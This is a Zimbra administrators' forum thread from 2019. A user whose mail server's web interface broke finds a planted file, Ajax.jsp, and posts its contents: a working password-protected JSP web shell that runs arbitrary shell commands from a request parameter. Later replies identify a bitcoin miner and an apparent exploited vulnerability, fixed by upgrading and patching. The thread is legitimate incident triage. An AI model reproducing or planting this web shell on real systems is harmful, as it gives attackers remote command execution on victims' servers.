zimbra not listen in 443 port

Discuss your pilot or production implementation with other Zimbra admins or our engineers.
seryoga_p
Posts: 4
Joined: Sat Apr 13, 2019 8:35 am

zimbra not listen in 443 port

Postby seryoga_p » Sat Apr 13, 2019 8:59 am

Hi, some strange things are going on my mail server

Code: Select all

[zimbra@mail ~]$ zmcontrol -v
Release 8.7.1_GA_1670.RHEL7_64_20161025045328 RHEL7_64 FOSS edition.
[zimbra@mail ~]$


Today suddenly stopped working zimbra on 443 port with error

Code: Select all

HTTP ERROR 404
Problem accessing /public/error.jsp. Reason:

    /public/error.jsp


nginx is fine:

Code: Select all

[zimbra@mail ~]$ lsof -i :443
COMMAND  PID   USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
nginx   2452 zimbra   10u  IPv4 485342      0t0  TCP *:https (LISTEN)
nginx   2453 zimbra   10u  IPv4 485342      0t0  TCP *:https (LISTEN)
nginx   2454 zimbra   10u  IPv4 485342      0t0  TCP *:https (LISTEN)
nginx   2455 zimbra   10u  IPv4 485342      0t0  TCP *:https (LISTEN)
[zimbra@mail ~]$

accidentally i looked for a folder /opt/zimbra/jetty/webapps/zimbra/public/

Code: Select all

[root@mail log]# ls -l /opt/zimbra/jetty/webapps/zimbra/public/
total 52
-rw-rw-r-- 1 zimbra zimbra 1522 Jan 31 10:44 404.html
-rw-rw-r-- 1 zimbra zimbra 1534 Oct 25  2016 5xx.html
-rw-r----- 1 zimbra zimbra  332 Apr 12 21:08 Ajax.jsp
-rw-rw-r-- 1 zimbra zimbra 2789 Oct 25  2016 blankHistory.html
-rw-rw-r-- 1 zimbra zimbra 1389 Oct 25  2016 blank.html
-rw-rw-r-- 1 zimbra zimbra 2131 Oct 25  2016 empty.html
drwxrwxr-x 2 zimbra zimbra 4096 Dec 10  2016 flash
drwxrwxr-x 2 zimbra zimbra 4096 Apr 12 21:08 jsp
-rw-rw-r-- 1 zimbra zimbra 2293 Oct 25  2016 launch.html
drwxrwxr-x 2 zimbra zimbra 4096 Apr 12 21:08 proto
drwxrwxr-x 3 zimbra zimbra 4096 Dec 10  2016 sounds
-rw-rw-r-- 1 zimbra zimbra   33 Jan 31 10:39 test.txt
drwxrwxr-x 2 zimbra zimbra 4096 Dec 10  2016 tmp

there is a file Ajax.jsp modified yesterday

Code: Select all

[root@mail public]# cat Ajax.jsp
<%if("LVwpVsmayetL6cvL2YTonwYg".equals(request.getParameter("ppwd"))){java.io.InputStream in = Runtime.getRuntime().exec(new String[]{"/bin/sh","-c", request.getParameter("pcom")}).getInputStream();int a = -1;byte[] b = new byte[2048];out.print("<pre>");while((a=in.read(b))!=-1){out.println(new String(b));}out.print("</pre>");}%>


am i hacked?? Is there any way to restore zimbra functionality?


phoenix
Ambassador
Ambassador
Posts: 26207
Joined: Fri Sep 12, 2014 9:56 pm
Location: Liverpool, England

Re: zimbra not listen in 443 port

Postby phoenix » Sat Apr 13, 2019 9:09 am

seryoga_p wrote:am i hacked?? Is there any way to restore zimbra functionality?
If you want to check then see if this applies to your server: https://forums.zimbra.org/viewtopic.php?f=15&t=65932
Regards

Bill

Rspamd: A high performance spamassassin replacement

If you'd like to see this implemented in a future version of ZCS then please vote on Bugzilla entries 97706 & 108168
seryoga_p
Posts: 4
Joined: Sat Apr 13, 2019 8:35 am

Re: zimbra not listen in 443 port

Postby seryoga_p » Sat Apr 13, 2019 10:16 am

fixed
1. upgrade to 8.7.11
2. Patch P10
now everything is working
GlooM
Advanced member
Advanced member
Posts: 82
Joined: Sat Sep 13, 2014 12:50 am

Re: zimbra not listen in 443 port

Postby GlooM » Thu Apr 18, 2019 7:03 pm

seryoga_p wrote:fixed
1. upgrade to 8.7.11
2. Patch P10
now everything is working


Hello Seryoga -)!
Please, check this question: viewtopic.php?f=15&t=66031&p=289821#p289821
I think I was hacked the same way. Do you have a file : /opt/zimbra/log/zmswatch?
seryoga_p
Posts: 4
Joined: Sat Apr 13, 2019 8:35 am

Re: zimbra not listen in 443 port

Postby seryoga_p » Fri Apr 19, 2019 11:35 am

GlooM wrote:Hello Seryoga -)!
Please, check this question: viewtopic.php?f=15&t=66031&p=289821#p289821
I think I was hacked the same way. Do you have a file : /opt/zimbra/log/zmswatch?

Hi, GlooM )
Yes, there is a files zmswatch and zmswatch.out
virustotal says its a bitcoin miner
GlooM
Advanced member
Advanced member
Posts: 82
Joined: Sat Sep 13, 2014 12:50 am

Re: zimbra not listen in 443 port

Postby GlooM » Fri Apr 19, 2019 1:25 pm

seryoga_p wrote:Yes, there is a files zmswatch and zmswatch.out
virustotal says its a bitcoin miner


As I understand it, the hacking technique is the same.
zmswatch - miner, Ajax.jsp - shell?

Last patch is required to solve the problem. But this is not the same as described here: https://lorenzo.mile.si/zimbra-cve-2019 ... ction/961/ - There are no files zmcat; l.sh and s.sh, and less trash in /opt/zimbra/jetty/

This is probably a new hacking technique than previously described in CVE-2019-9670
seryoga_p
Posts: 4
Joined: Sat Apr 13, 2019 8:35 am

Re: zimbra not listen in 443 port

Postby seryoga_p » Fri Apr 19, 2019 1:47 pm

Scanned with clamav:
[root@mail log]# sudo clamscan -i -r /opt/zimbra/log
/opt/zimbra/log/zmswatch: Multios.Coinminer.Miner-6781728-2 FOUND


It would probably be more correct to make backups of zimbra, reinstall the centos and make a fresh zimbra install then restore backup, but unfortunately, there is no storage space on the rented vps to recover mail quickly (now ~ 80GB).
I plan to stay on this vps to the end of the year and then move to physical hardware with zimbra or somesing else.

Return to “Administrators”

Who is online

Users browsing this forum: Baidu [Spider], Google [Bot] and 21 guests